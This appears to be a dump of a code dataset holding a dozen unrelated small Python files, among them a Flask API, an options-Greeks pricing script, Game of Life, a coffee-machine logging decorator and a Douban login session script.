insert into huoli_eat_activeusers_quarterly_test values (%s, %s, now(), now())
on duplicate key update updatetime = now() ,
s_day = VALUES(s_day),
active_users = VALUES(active_users)
"""
|
12,726 | a3e80a46cd3e66c362e76a30db5c2ac423b65edb | from .errors import *
from flask import jsonify, send_file
from app import db
from . import api, get_query_string
from app.main.models import *
from app.main.controllers import GSECMonthlyRecon, GSECMonthlyReconReport
# gsec code section #############################################
@api.route('/gseccodes', methods=['GET'])
def get_gseccodes():
return jsonify([g.to_json() for g in
sorted(
GSECCode.query
.filter_by(**get_query_string(GSECCode)).all(),
key=lambda x: x.SortingScore,
reverse=True)]), 200
@api.route('/gseccodelist', methods=['GET'])
def get_gseccodelist():
gseccodes = sorted(GSECCode.query.all(),
key=lambda x: x.SortingScore, reverse=True)
return jsonify([g.Code for g in gseccodes]), 200
@api.route('/gseccodes/<string:Oid_or_Code>', methods=['GET'])
def get_gseccode(Oid_or_Code):
if len(Oid_or_Code) > 20:
code = GSECCode.query.filter_by(Oid=Oid_or_Code).first_or_404()
else:
code = GSECCode.query.filter_by(Code=Oid_or_Code).first_or_404()
return jsonify(code.to_json()), 200
@api.route('/gseccodes', methods=['POST'])
def create_gseccode():
json_gcode = request.json
code = GSECCode.from_json(json_gcode)
db.session.add(code)
db.session.commit()
return jsonify(code.to_json()), 201
@api.route('/gseccodes/<string:code>/recon/<int:year>', methods=['GET'])
def get_monthly_recon(code, year):
recon = GSECMonthlyRecon(code, year)
return jsonify(recon.report), 200
@api.route('/gseccodes/<string:code>/recon/<string:year>/report',
methods=['GET'])
def get_monthly_recon_report(code, year):
code = code.upper()
recon = GSECMonthlyRecon(code, year)
data = {'gseccode': code, 'data': recon.report}
report = GSECMonthlyReconReport()
file_name = code + '_' + year + '.xlsx'
return send_file(report.get_report_xlsx(data),
mimetype='application/vnd.ms-excel',
attachment_filename=file_name,
as_attachment=True)
|
12,727 | ce3288817e0b1a89b61d4cb616332c65d83de8b0 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-11-24 14:08
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("foirequest", "0007_auto_20171121_1134"),
]
operations = [
migrations.AlterModelOptions(
name="foirequest",
options={
"get_latest_by": "last_message",
"ordering": ("-last_message",),
"permissions": (
("see_private", "Can see private requests"),
("create_batch", "Create batch requests"),
),
"verbose_name": "Freedom of Information Request",
"verbose_name_plural": "Freedom of Information Requests",
},
),
]
|
12,728 | 8fc532edc796e5785ca98f3d1aa5e02a309874cc | import json
import grpc
import numpy as np
import tensorflow as tf
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2_grpc
hostport="localhost:8500"
channel = grpc.insecure_channel(hostport)
stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)
request = predict_pb2.PredictRequest()
request.model_spec.name = 'model'
request.model_spec.signature_name = 'serving_default'
x = [1.0, 2.0, 5.0]
proto = tf.make_tensor_proto(np.array(x), dtype=float)
request.inputs['x'].CopyFrom(proto)
result_future = stub.Predict.future(request, 10.25)
response = np.array(result_future.result())
print(response)
|
12,729 | 72b4efc7c67b7f4c4b52d2cca39d5e9f4af85178 | import csv
import os
import numpy as np
import pandas as pd
from pandas import DataFrame
from math import log, exp, pi, sqrt
from scipy.stats import norm
import collections
from datetime import date
from recordtype import recordtype
from scipy.interpolate import make_interp_spline, BSpline
import matplotlib.pyplot as plt
from sklearn.metrics import mean_squared_error
###############
def get_files(folder):
path = os.getcwd() + "\\" + folder
files = os.listdir(path)
return files
volatility = float(input("Initial Volaitilty %")) / 100.0
spotp = float(input("Initial Spot Price\n"))
#print(spotp)
###############
def d1(S, K, T, sig, r):
t1 = log(S / K)
t2 = (sig ** 2) * T / 2.0
t3 = sig * sqrt(T)
return (t1 + t2) / t3
def d2(S, K, T, sig, r):
t1 = log(S / K)
t2 = (sig ** 2) * T / 2.0
t3 = sig * sqrt(T)
return (t1 - t2) / t3
def CallPrice(S, K, T, sig, r):
t1 = S * norm.cdf(d1(S, K, T, sig, r))
t2 = K * norm.cdf(d2(S, K, T, sig, r))
return exp(-r * T) * (t1 - t2)
def PutPrice(S, K, T, sig, r):
t1 = K * norm.cdf(-1 * d2(S, K, T, sig, r))
t2 = S * norm.cdf(-1 * d1(S, K, T, sig, r))
return exp(-r * T)(t1 - t2)
# Call Greeks formulae
def c_delta(S, K, T, sig, r):
return norm.cdf(d1(S, K, T, sig, r))
def c_theta(S, K, T, sig, r):
t1 = (S * norm.pdf(d1(S, K, T, sig, r)) * sig) / (2 * sqrt(T))
t2 = r * K * exp(-r * T) * norm.cdf(d2(S, K, T, sig, r))
return (-t1 - t2) / 365.0
def c_gamma(S, K, T, sig, r):
return norm.pdf(d1(S, K, T, sig, r)) / (S * sig * sqrt(T))
def c_vega(S, K, T, sig, r):
return (S * norm.pdf(d1(S, K, T, sig, r)) * sqrt(T))# Per CDay or Per TDay
def numOfDays(date1, date2):
return (date2 - date1).days
# Put Greeks formulae
def p_delta(S, K, T, sig, r):
return norm.cdf(d1(S, K, T, sig, r)) - 1
def p_theta(S, K, T, sig, r):
t1 = (S * norm.pdf(d1(S, K, T, sig, r)) * sig) / (2 * sqrt(T))
t2 = r * K * exp(-r * T) * norm.cdf(d2(S, K, T, sig, r))
return (-t1 + t2) / 365.0
def p_gamma(S, K, T, sig, r):
return norm.pdf(d1(S, K, T, sig, r)) / (S * sig * sqrt(T))
def p_vega(S, K, T, sig, r):
return (S * norm.pdf(d1(S, K, T, sig, r)) * sqrt(T))# Per Cday or per Tday###############
# calculate number of days from current date till expiry date
def calculate_t(current_date, expiry_date):
dat1 = current_date
dat2 = expiry_date
dat1_day = dat1[0] + dat1[1]
dat1_mon = dat1[3: 5]
dat1_yr = int(dat1[6: 10])
dat2_day = dat2[0] + dat2[1]
dat2_mon = dat2[3: 5]
dat2_yr = int(dat2[6: 10])
date1 = date(int(dat1_yr), int(dat1_mon), int(dat1_day))
date2 = date(int(dat2_yr), int(dat2_mon), int(dat2_day))
t = numOfDays(date1, date2)
return (t)
# Plot graphs for call options and put options separately and for each expiry date separately to observe the difference between old premium and new premium
def plot_init_final(files):
spot_price = spotp
processed_files = get_files("Graph")
for pf in processed_files:
#print(pf[-4:])
if pf[-4:] == ".jpg":
processed_files.remove(pf)
for f,pf in zip(files , processed_files):
# Old premium values
df = pd.read_csv('Data//'+f ,sep = ',', header = None, skiprows = 1)
before_matrix = df.as_matrix()
ix = before_matrix[:,0] # Strike Price
iy = before_matrix[:,1] #Premium
# Estimated 'new premium' values
df = pd.read_csv('Graph//'+pf ,sep = ',', header = None, skiprows = 1)
after_matrix = df.as_matrix()
fx = after_matrix[:,0] # Strike Price
fy = after_matrix[:,1] #Premium
# Plot for call and put options separately
# For call options for each expiry date plot initial and final curve together:
if pf[5] == "c":
fig = plt.figure()
plt.plot([spot_price , spot_price ] , [0 , 2000] , 'b' )
# plotting initial curve
for x1, x2, y1, y2 in zip(ix, ix[1: ], iy, iy[1: ]):
if x1 > spot_price:
plt.plot([x1, x2], [y1, y2], 'y', linestyle = '--')
elif x1 < spot_price:
plt.plot([x1, x2], [y1, y2], 'c' , linestyle = '--' )
else:
plt.plot([x1, x2], [y1, y2], 'b', marker = '.' )
# plotting final curve
for x1, x2, y1, y2 in zip(fx, fx[1: ], fy, fy[1: ]):
if x1 > spot_price:
plt.plot([x1, x2], [y1, y2], 'r', linestyle = '-')
elif x1 < spot_price:
plt.plot([x1, x2], [y1, y2], 'g' , linestyle = '-' )
else:
plt.plot([x1, x2], [y1, y2], 'b', marker = '.' )
fig.suptitle(f, fontsize=16)
plt.xlabel('strike price', fontsize = 14)
plt.ylabel('new premium', fontsize = 14)
fig.savefig('Graph//'+f[0:-4] +'-Before-After' + '.jpg')
else: # For put options for each expiry date plot initial and final curve together:
fig = plt.figure()
# plotting initial curve
plt.plot([spot_price , spot_price ] , [0 , 2000] , 'b' )
for x1, x2, y1, y2 in zip(ix, ix[1: ], iy, iy[1: ]):
if x1 > spot_price:
plt.plot([x1, x2], [y1, y2], 'c',linestyle = '--')
elif x1 < spot_price:
plt.plot([x1, x2], [y1, y2], 'y',linestyle = '--')
else:
plt.plot([x1, x2], [y1, y2], 'b', marker = 'o')
# plotting final curve
for x1, x2, y1, y2 in zip(fx, fx[1: ], fy, fy[1: ]):
if x1 > spot_price:
plt.plot([x1, x2], [y1, y2], 'g',linestyle = '-')
elif x1 < spot_price:
plt.plot([x1, x2], [y1, y2], 'r',linestyle = '-')
else:
plt.plot([x1, x2], [y1, y2], 'b', marker = 'o')
fig.suptitle(f, fontsize=16)
plt.xlabel('strike price', fontsize = 14)
plt.ylabel('new premium', fontsize = 14)
fig.savefig('Graph//'+f[:-4] +'-Before-After' + '.jpg')
#To Plot only Calls
def plot_calls(files):
calls = list(filter(lambda x: x[5]=="c", files))
fig1 = plt.figure(1)
plt.plot([spotp , spotp ] , [0 , 2000] , 'b' )
for f in calls:
df = pd.read_csv('Data//'+f ,sep = ',', header = None, skiprows = 1)
before_matrix = df.as_matrix()
x = before_matrix[:,0] # Strike Price
y = before_matrix[:,1] #Premium
expiry = list(before_matrix[:3,3])
#print(expiry)
plt.plot(x,y,label=expiry[0])
fig1.suptitle("Calls Before", fontsize=16)
plt.xlabel('Strike Price', fontsize = 14)
plt.ylabel('Premium', fontsize = 14)
plt.legend()
plt.show()
fig1.savefig('Graph//Plot_Calls_1Before' + '.jpg')
plot_call_after()
def plot_call_after():
call_f = get_files("Graph")
call_files = list(filter(lambda x: x[5]=="c" and x[-4:]==".csv", call_f))
fig2 = plt.figure(2)
plt.plot([spotp , spotp ] , [0 , 2000] , 'b' )
for cf in call_files:
df = pd.read_csv('Graph//'+cf ,sep = ',', header = None, skiprows = 1)
before_matrix = df.as_matrix()
x = before_matrix[:,0] # Strike Price
y = before_matrix[:,1] #Premium
expiry = list(before_matrix[:6,6])
#print(expiry)
plt.plot(x,y,label=expiry[0])
fig2.suptitle("Calls After", fontsize=16)
plt.xlabel('Strike Price', fontsize = 14)
plt.ylabel('Premium', fontsize = 14)
plt.legend()
plt.show()
fig2.savefig('Graph//Plot_Calls_2After' + '.jpg')
#plot put
def plot_puts(files):
puts = list(filter(lambda x: x[5]=="p", files))
fig1 = plt.figure(3)
plt.plot([spotp , spotp ] , [0 , 2000] , 'b' )
for f in puts:
df = pd.read_csv('Data//'+f ,sep = ',', header = None, skiprows = 1)
before_matrix = df.as_matrix()
x = before_matrix[:,0] # Strike Price
y = before_matrix[:,1] #Premium
expiry = list(before_matrix[:3,3])
#print(expiry)
plt.plot(x,y,label=expiry[0])
fig1.suptitle("Puts Before", fontsize=16)
plt.xlabel('Strike Price', fontsize = 14)
plt.ylabel('Premium', fontsize = 14)
plt.legend()
plt.show()
fig1.savefig('Graph//Plot_Puts_1Before' + '.jpg')
plot_put_after()
def plot_put_after():
put_f = get_files("Graph")
put_files = list(filter(lambda x: x[5]=="p" and x[-4:]==".csv", put_f))
fig2 = plt.figure(4)
plt.plot([spotp , spotp ] , [0 , 2000] , 'b' )
for pf in put_files:
df = pd.read_csv('Graph//'+pf ,sep = ',', header = None, skiprows = 1)
before_matrix = df.as_matrix()
x = before_matrix[:,0] # Strike Price
y = before_matrix[:,1] #Premium
expiry = list(before_matrix[:6,6])
#print(expiry)
plt.plot(x,y,label=expiry[0])
fig2.suptitle("Puts After", fontsize=16)
plt.xlabel('Strike Price', fontsize = 14)
plt.ylabel('Premium', fontsize = 14)
plt.legend()
plt.show()
fig2.savefig('Graph//Plot_Puts_2After' + '.jpg')
# Plot graphs for call options and put options together so as to compare the 'new premium' for different expiry dates for both options
def plot_multiple(files):
processed_files = get_files("Graph")
spot_price = spotp
graph_data = []
for pfiles in processed_files:
pf = pfiles[0:-4]
pfname = "Graph//" + pf + ".csv"
df = pd.read_csv(pfname ,sep = ',', header = None, skiprows = 1)
numpy_matrix = df.as_matrix()
x = numpy_matrix[:,0] # Strike Price
y = numpy_matrix[:,1] #Premium
graph_data.append([x,y])
#fig = plt.figure()
#print(spot_price)
plt.suptitle("Changes in All Graphs")
if pf[5] == "c": #call options output
plt.plot([spot_price , spot_price ] , [0 , 2500] , 'b' )
for x1, x2, y1, y2 in zip(x, x[1: ], y, y[1: ]):
if x1 > spot_price:
plt.plot([x1, x2], [y1, y2], 'r', linestyle = '-')
elif x1 < spot_price:
plt.plot([x1, x2], [y1, y2], 'g' , linestyle = '-' )
else:
plt.plot([x1, x2], [y1, y2], 'b', marker = '.' )
else: #put options output
plt.plot([spot_price , spot_price ] , [0 , 2000] , 'b' )
for x1, x2, y1, y2 in zip(x, x[1: ], y, y[1: ]):
if x1 > spot_price:
plt.plot([x1, x2], [y1, y2], 'c',linestyle = '-')
elif x1 < spot_price:
plt.plot([x1, x2], [y1, y2], 'y',linestyle = '-')
else:
plt.plot([x1, x2], [y1, y2], 'b', marker = 'o')
plt.xlabel('strike price', fontsize = 14)
plt.ylabel('new premium', fontsize = 14)
plt.savefig('Graph//'+pf + '.jpg')
def calculate_rmse():
estimate_files = get_files("Graph")
estimate_files = list(filter(lambda x: x[-4:]==".csv" , estimate_files))
#print(list(estimate_files))
actual_files = get_files("Actual_Data")
#print(actual_files)
rmse_list = []
for af,ef in zip(actual_files , estimate_files):
df = pd.read_csv("Actual_Data//"+af , usecols = ['premium'])
x = df.as_matrix()
actual_data = x.astype(np.float)
#print(actual_data)
df = pd.read_csv("Graph//"+ef, usecols = ['new_premium'])
x = df.as_matrix()
estimated_data = x.astype(np.float)
#print(estimated_data)
rmse = sqrt(mean_squared_error(actual_data, estimated_data))
#print(rmse)
rmse_list.append(rmse)
df = pd.DataFrame(data = {"File Name": estimate_files , "Actual Price file": actual_files ,"RMSE":rmse_list})
df.to_csv(r'Graph//RMSE', sep = ',', index = False)
return rmse_list
'''def plot_output(file_name, option_type):
spot_price = 9100
f = file_name[2: -4]
print(file_name)
print(f)
fname = f + ".csv"
df = pd.read_csv(fname, sep = ',', header = None, skiprows = 1)
numpy_matrix = df.as_matrix()
y = numpy_matrix[: , 1]# Strike Price
x = numpy_matrix[: , 0]# Premium
fig = plt.figure()
if option_type == "call":
for x1, x2, y1, y2 in zip(x, x[1: ], y, y[1: ]):
if x1 > spot_price:
plt.plot([x1, x2], [y1, y2], 'g')
elif x1 < spot_price:
plt.plot([x1, x2], [y1, y2], 'r')
else:
plt.plot([x1, x2], [y1, y2], 'b', marker = '.')
else:
for x1, x2, y1, y2 in zip(x, x[1: ], y, y[1: ]):
if x1 > spot_price:
plt.plot([x1, x2], [y1, y2], 'r')
elif x1 < spot_price:
plt.plot([x1, x2], [y1, y2], 'g')
else:
plt.plot([x1, x2], [y1, y2], 'b', marker = 'o')
fig.suptitle(f, fontsize=16)
plt.xlabel('strike price', fontsize = 14)
plt.ylabel('new premium', fontsize = 14)
fig.savefig(f + '.jpg')
plt.show() '''
def call_greeks(database, fname , change_in_spot_price , change_in_volatility , user_date):
strike_list = []
new_premium_list = []
old_premium_list = []
change_list = []
curr_date_list = []
user_date_list = []
expiry_date_list = []
v = volatility
# All greeks are calculated using greeks formulae for call options.
# The new premium is calculated as a cascading effect of the greeks as follows:
# Step 1: 'spot price' and 'volatility' are updated according to their respective changes
# Step 2: 'gamma' for call options is calculated
# Step 3: 'old delta' is calculated and using the calculated 'gamma', 'new delta' is calculated
# Step 4: 'theta' for call options is calculated
# Step 5: 'vega' for call options is calculated and 'vega effect' is calculated using this 'vega' and 'change in volatility'
# Step 6: 'new premium' is calculated initially by effect of 'new delta' followed by effect of 'theta' and 'vega'
# Thus, 'gamma' is used to calculate 'new delta', and further 'new premium' is calculated with the effect of 'new delta', 'theta' and 'vega'
print("CALL OPTIONS USING GREEKS")
for d in database:
num_remaining_days = d.num_remaining_days
if user_date != "":
num_day = calculate_t(d.current_date, user_date)
else:
num_day = num_remaining_days
t = d.t
# Step 1:
d.spot_price = d.spot_price + change_in_spot_price
spot_price = d.spot_price
v = v + change_in_volatility
old_premium_list.append(d.old_premium)
# Step 2:
gamma = c_gamma(spot_price, int(float(d.strike_price)), t, v, 0.07)
d.gamma = gamma# print("Gamma is ", gamma)
# Step 3:
old_delta = c_delta(spot_price, int(float(d.strike_price)), t, v, 0.07)
d.old_delta = old_delta# print("Old Delta is ", old_delta)
new_delta = old_delta + gamma * change_in_spot_price# print("New Delta is ", new_delta)
d.new_delta = new_delta
# Step 4:
theta = c_theta(spot_price, int(float(d.strike_price)), t, v, 0.07)# print("Theta is ", theta)
d.theta = theta
# Step 5:
vega = c_vega(spot_price, int(float(d.strike_price)), t, v, 0.07)
vega_effect = vega * change_in_volatility
# Step 6:
#print("In Theta, Numday = ",num_day)
new_premium = int(float(d.old_premium)) + ((old_delta + new_delta) / 2.0) * change_in_spot_price# print("Old premium is ", d.old_premium)# print("(After Gamma effect) New premium is ", new_premium)
new_premium = new_premium + num_day * theta + vega_effect# addition cuz theta already has a negative value
if new_premium < 0:
new_premium = 0
d.new_premium = new_premium
# remaining values are added to the database
strike_list.append(d.strike_price)
new_premium_list.append(d.new_premium)
curr_date_list.append(d.current_date)
user_date_list.append(user_date)
change = float(d.new_premium)-float(d.old_premium)
change_list.append(change)
expiry_date_list.append(d.expiry_date)
# generate the ouput file for call opions with 'strike price' and its corresponding 'new premium','old premium' , 'net change' , 'current date' , 'date of new premium', 'expiry_date'.
df = pd.DataFrame(data = {"strike_price": strike_list, "new_premium": new_premium_list ,"Old Premium":old_premium_list ,"Change":change_list , "current_date":curr_date_list , "Date of New Premium":user_date_list , "Expiry Date":expiry_date_list })
fname1 = fname[0: -4]
file_name = "./"+fname1 + "_output.csv"
df.to_csv(r'Graph//'+file_name, sep = ',', index = False)
def put_greeks(database, fname , change_in_spot_price , change_in_volatility , user_date):
strike_list = []
new_premium_list = []
old_premium_list = []
change_list = []
curr_date_list = []
user_date_list = []
expiry_date_list = []
v = volatility
print("PUT OPTIONS USING GREEKS")
# Follow the same steps of 'call_greeks' to calculate new premium for put options.
# But here the Greeks are calculated using greeks formulae for put options.
for d in database:
num_remaining_days = d.num_remaining_days
if user_date != "":
num_day = calculate_t(d.current_date, user_date)
else:
num_day = num_remaining_days
t = d.t
# Step 1:
d.spot_price = d.spot_price + change_in_spot_price
spot_price = d.spot_price
v = v + change_in_volatility
old_premium_list.append(d.old_premium)
# Step 2:
gamma = p_gamma(spot_price, int(float(d.strike_price)), t, v, 0.07)
d.gamma = gamma
# Step 3:
old_delta = p_delta(spot_price, int(float(d.strike_price)), t, v, 0.07)
d.old_delta = old_delta
new_delta = old_delta + gamma * change_in_spot_price
d.new_delta = new_delta
# Step 4:
theta = p_theta(spot_price, int(float(d.strike_price)), t, v, 0.07)# print("Theta is ", theta)
d.theta = theta
# Step 5:
vega = c_vega(spot_price, int(float(d.strike_price)), t, v, 0.07)
vega_effect = vega * change_in_volatility
# Step 6:
new_premium = int(float(d.old_premium)) + ((old_delta + new_delta) / 2.0) * change_in_spot_price
new_premium = new_premium + num_day * theta + vega_effect# addition cuz theta already has a negative value
if new_premium < 0:
new_premium = 0
d.new_premium = new_premium
# remaining values are added to the database
strike_list.append(d.strike_price)
new_premium_list.append(d.new_premium)
curr_date_list.append(d.current_date)
user_date_list.append(user_date)
change = float(d.new_premium)-float(d.old_premium)
change_list.append(change)
expiry_date_list.append(d.expiry_date)
# generate the ouput file for put options with 'strike price' and its corresponding 'new premium','old premium' , 'net change' , 'current date' , 'date of new premium', 'expiry_date'.
df = pd.DataFrame(data = {"strike_price": strike_list, "new_premium": new_premium_list ,"Old Premium":old_premium_list ,"Change":change_list , "current_date":curr_date_list , "Date of New Premium":user_date_list , "Expiry Date":expiry_date_list })
fname1 = fname[0: -4]
file_name = "./" + fname1 + "_output.csv"
df.to_csv(r'Graph//'+file_name, sep = ',', index = False)
#This function stores all data from the file in a variable called 'database' and returns this 'database'
def process_options(fname, init_spot):
rows = []
fields = []
#MyStruct stores the information for each row in the input file(i.e. values of all columns for each row) and remaining values are filled later
MyStruct = recordtype("MyStruct", "option_type spot_price num_remaining_days t strike_price old_premium current_date expiry_date moneyness gamma old_delta new_delta theta vega new_premium")
#database stores the information of all the rows in the file
database = []
fname = "Data\\" + fname
with open(fname, 'r') as csvfile:
csvreader = csv.reader(csvfile)
fields = next(csvreader)
for row in csvreader:
rows.append(row)# print(row)
strike_price = row[0]
old_premium = row[1]
current_date = row[2]
expiry_date = row[3]
moneyness = row[4]
option_type = row[5]
t = calculate_t(current_date, expiry_date)
num_remaining_days = t
#Life of the option(t) = number of days till option maturity/number of trading days(252)
t = t / 252
# this 't' is used in calculating greeks
Node = MyStruct(option_type , init_spot, num_remaining_days, t, strike_price, old_premium, current_date, expiry_date, moneyness, "", "", "", "","", "")
database.append(Node)
return database,option_type
if __name__ == "__main__":
#read all files from the 'Data' folder
files = []
files = get_files("Data")
print(files)
#'databases' stores the data of all the files
databases = []
# Each row in the file is either a call or a put option
for file in files:
db,otype = process_options(file , spotp)
databases.append(db)
change_in_spot_price = float(input("Enter the Estimated CHANGE in Spot Price of Underlying\n"))
change_in_volatility = float(input("Enter Change in % Volatility(+/-)\n")) / 100.0
#Updating the golbal Spot Price and Volatility values
spotp += change_in_spot_price
volatility += change_in_volatility
# Choice 1: User can go for expiry date if he wants to know the premium on the date of expiry
# Or Choice 2: The user can enter a date before the expiry date to know the price of the premium
rem_flag = int(input("Enter your choice : \n(1)-Expiry day \n(2)-Some Other day\n" ))
if rem_flag == 2:
user_date = input("Enter the date for which you want to know the price of premium\nCurrent Date is (20-05-2020)\n")
else:
user_date = ""
#estimating 'new premium' for call and put options
for d,f in zip(databases,files):
if f[5] == "c":
call_greeks(d , f , change_in_spot_price , change_in_volatility , user_date )
else:
put_greeks(d , f , change_in_spot_price , change_in_volatility , user_date )
# Plot the output graphs for call and put options together('new premium' vs 'strike price')
plot_multiple(files)
# Plot graphs for each output file for a comparison between initial curve and final curve of 'new premium' vs 'strike price'
plot_init_final(files)
rmse = calculate_rmse()
print(rmse)
"""plot_calls(files)
plot_puts(files)
"""
|
12,730 | 066d6d835b5c0bf65d9b3dc17708b472f187824b | #add multiple values to a dictionary key with other rules provided
def update_dictionary(d, key, value):
if key in d.keys():
d[key].append(value)
elif 2 * key in d.keys():
d[2 * key].append(value)
else:
d[2 * key] = [value]
#second option
def update_dictionary(d, key, value):
if key in d:
d[key] += [value]
elif 2 * key in d:
d[2 * key] += [value]
else:
d[2 * key] = [value]
|
12,731 | 1249a2b66535ef41420c7cd4ee017e610ddefc55 | '''
公告所有接口
'''
import os
from conf import settings
from db import models
def get_all_school_interface():
# 1、获取学校文件路径
school_dir = os.path.join(
settings.DB_PATH, 'School'
)
# 2判断文件夹是否存在
if not os.path.exists(school_dir):
return False, '没有学校,请联系管理员'
# 3文件夹存在获取文件夹中所有文件的名字
school_list = os.listdir(school_dir)
return True, school_list
# 公共登录接口
def login_interface(user, pwd, user_type):
if user_type == 'admin':
obj = models.Admin.select(user)
elif user_type == 'student':
obj = models.Student.select(user)
elif user_type == 'teacher':
obj = models.Teacher.select(user)
else:
print()
return False, '你输入的类型不存在'
if obj:
if pwd == obj.pwd:
return True, '登陆成功'
else:
return False, '密码错误'
else:
return False, '用户民不存在'
#获取指定学校的所有课程
def get_all_course_in_school_interface(school_name):
#1、获取学校对象
school_obj=models.School.select(school_name)
#2、获取学校对象下的课程
course_list=school_obj.course_list
if not course_list:
return False,'该学校没有课程'
return True,course_list
|
12,732 | 1e43146ff055cba6f3900ab8dab6acedb0e2c809 | import pathlib
import random
import copy
from typing import List, Optional, Tuple
Cell = Tuple[int, int]
Cells = List[int]
Grid = List[Cells]
class GameOfLife:
def __init__(
self,
size: Tuple[int, int],
randomize: bool=True,
max_generations: Optional[float]=float('inf')
) -> None:
# Размер клеточного поля
self.rows, self.cols = size
# Предыдущее поколение клеток
self.prev_generation = self.create_grid()
# Текущее поколение клеток
self.curr_generation = self.create_grid(randomize=randomize)
# Максимальное число поколений
self.max_generations = max_generations
# Текущее число поколений
self.generations = 1
def create_grid(self, randomize: bool=False) -> Grid:
"""
Создание списка клеток.
Клетка считается живой, если ее значение равно 1, в противном случае клетка
считается мертвой, то есть, ее значение равно 0.
Parameters
----------
randomize : bool
Если значение истина, то создается матрица, где каждая клетка может
быть равновероятно живой или мертвой, иначе все клетки создаются мертвыми.
Returns
----------
out : Grid
Матрица клеток размером `cell_height` х `cell_width`.
"""
if randomize == True:
self.curr_generation = []
for i in range(self.rows):
underlist_cell = []
for j in range(self.cols):
underlist_cell += [random.randint(0,1)]
self.curr_generation += [underlist_cell]
pass
else:
self.curr_generation = []
for i in range(self.rows):
underlist_cell = []
for j in range(self.cols):
underlist_cell += [0]
self.curr_generation += [underlist_cell]
return self.curr_generation
def get_neighbours(self, cell: Cell) -> Cells:
"""
Вернуть список соседних клеток для клетки `cell`.
Соседними считаются клетки по горизонтали, вертикали и диагоналям,
то есть, во всех направлениях.
Parameters
----------
cell : Cell
Клетка, для которой необходимо получить список соседей. Клетка
представлена кортежем, содержащим ее координаты на игровом поле.
Returns
----------
out : Cells
Список соседних клеток.
"""
list_neighbours = []
cell_row, cell_col = cell
for i in range(3):
for j in range(3):
nbcell_row = cell_row - 1 + i
nbcell_col = cell_col - 1 + j
if((nbcell_row, nbcell_col) != cell and nbcell_col >= 0 and nbcell_row >= 0 and nbcell_col < self.cols and nbcell_row < self.rows):
list_neighbours += [self.curr_generation[nbcell_row][nbcell_col]]
return list_neighbours
def get_next_generation(self) -> Grid:
"""
Получить следующее поколение клеток.
Returns
----------
out : Grid
Новое поколение клеток.
"""
help_list = []
for i in range(self.rows):
underlist_cell = []
for j in range(self.cols):
underlist_cell += [0]
help_list += [underlist_cell]
for i in range(self.rows):
for j in range(self.cols):
count_neighbours = 0
for nb_cell in self.get_neighbours((i,j)):
if nb_cell == 1:
count_neighbours += 1
if self.curr_generation[i][j] == 1:
if count_neighbours == 2 or count_neighbours == 3:
help_list[i][j] = 1
else:
if count_neighbours == 3:
help_list[i][j] = 1
return help_list
def step(self) -> None:
"""
Выполнить один шаг игры.
"""
self.prev_generation = copy.deepcopy(self.curr_generation)
self.curr_generation = self.get_next_generation()
self.generations += 1
@property
def is_max_generations_exceeded(self) -> bool:
"""
Не превысило ли текущее число поколений максимально допустимое.
"""
return self.generations >= self.max_generations
@property
def is_changing(self) -> bool:
"""
Изменилось ли состояние клеток с предыдущего шага.
"""
return self.prev_generation != self.curr_generation
@staticmethod
def from_file(filename: pathlib.Path) -> 'GameOfLife':
"""
Прочитать состояние клеток из указанного файла.
"""
grid_file = open(filename)
grid = grid_file.readlines()
for i in range(len(grid)):
grid[i] = list(map(int, list(grid[i][0:len(grid[i])-1])))
life = GameOfLife((len(grid), len(grid[i])))
life.curr_generation = grid
grid_file.close()
return life
def save(filename: pathlib.Path) -> None:
"""
Сохранить текущее состояние клеток в указанный файл.
"""
file = open(filename, 'w')
for row in range(len(self.curr_generation)):
file.write("".join(map(str, self.curr_generation[row])) + '\n')
file.close()
|
12,733 | d65fa3a18b92d5ec46e94ad2e4489d97fe111b39 | from re import sub
from transliterate import translit, exceptions
def make_url(title):
url = 'default_url'
try:
url = sub(r'_| |!|\?|\.|,|\'|\"|;|:', '-', translit(title, reversed=True).lower())
except exceptions.LanguageDetectionError:
url = sub(r'_| |!|\?|\.|,|\'|\"|;|:', '-', title.lower())
return url
|
12,734 | 95f077bafc8af35cd4f4f292f63f6aca4531336a | import time
from random import randint
def log(function):
def add_log(*args, **kwargs):
f = open("machine.log", "a")
start_time = time.time()
test = function(*args)
f.write("(rpichon)Running: {}\t\t[ ".format(function.__name__))
f.write("exec_time = {:.3f} ms ]\n".format(time.time() - start_time))
return(test)
return(add_log)
class CoffeeMachine():
water_level = 100
@log
def start_machine(self):
if self.water_level > 20:
return True
else:
print("Please add water!")
return False
@log
def boil_water(self):
return "boiling..."
@log
def make_coffee(self):
if self.start_machine():
for _ in range(20):
time.sleep(0.1)
self.water_level -= 1
print(self.boil_water())
print("Coffee is ready!")
@log
def add_water(self, water_level):
time.sleep(randint(1, 5))
self.water_level += water_level
print("Blub blub blub...")
if __name__ == "__main__":
machine = CoffeeMachine()
for i in range(0, 5):
machine.make_coffee()
machine.make_coffee()
machine.add_water(70)
|
12,735 | 867bec25c0d83ab5aed558a6d2de255d00e5f4f1 | import time
import requests
from fake_useragent import UserAgent
ua = UserAgent(verify_ssl=False)
headers = {
'User-Agent' : ua.random,
'Referer' : 'https://accounts.douban.com/passport/login_popup?login_source=anony'
}
s = requests.Session()
# 会话对象:在同一个 Session 实例发出的所有请求之间保持 cookie,
# 期间使用 urllib3 的 connection pooling 功能。
# 向同一主机发送多个请求,底层的 TCP 连接将会被重用,从而带来显著的性能提升。
login_url = 'https://accounts.douban.com/j/mobile/login/basic'
form_data = {
'ck':'',
'name':'15055495@qq.com',
'password':'',
'remember':'false',
'ticket':''
}
# post数据前获取cookie
pre_login = 'https://accounts.douban.com/passport/login'
pre_resp = s.get(pre_login, headers=headers)
response = s.post(login_url, data=form_data, headers=headers, cookies=s.cookies)
# 登陆后可以进行后续的请求
# url2 = 'https://accounts.douban.com/passport/setting'
# response2 = s.get(url2,headers = headers)
# response3 = newsession.get(url3, headers = headers, cookies = s.cookies)
# with open('profile.html','w+') as f:
# f.write(response2.text)
|
12,736 | 1e79f75f2171cc1dc550697005395f5f101f73ce | from consul import Consul
from typing import Any, Union, Mapping
from dataclasses import dataclass
from resource_it import Resource, ResourceNotFoundError
import cfg_it
import log_it
log = log_it.logger(__name__)
@cfg_it.props
class cfg:
consul_host: str = "localhost"
class Consul_KV(Resource):
@dataclass
class meta_cls:
key: str
consul: Any
@dataclass
class data_cls:
value: Union[str, Mapping] = ""
def init(self):
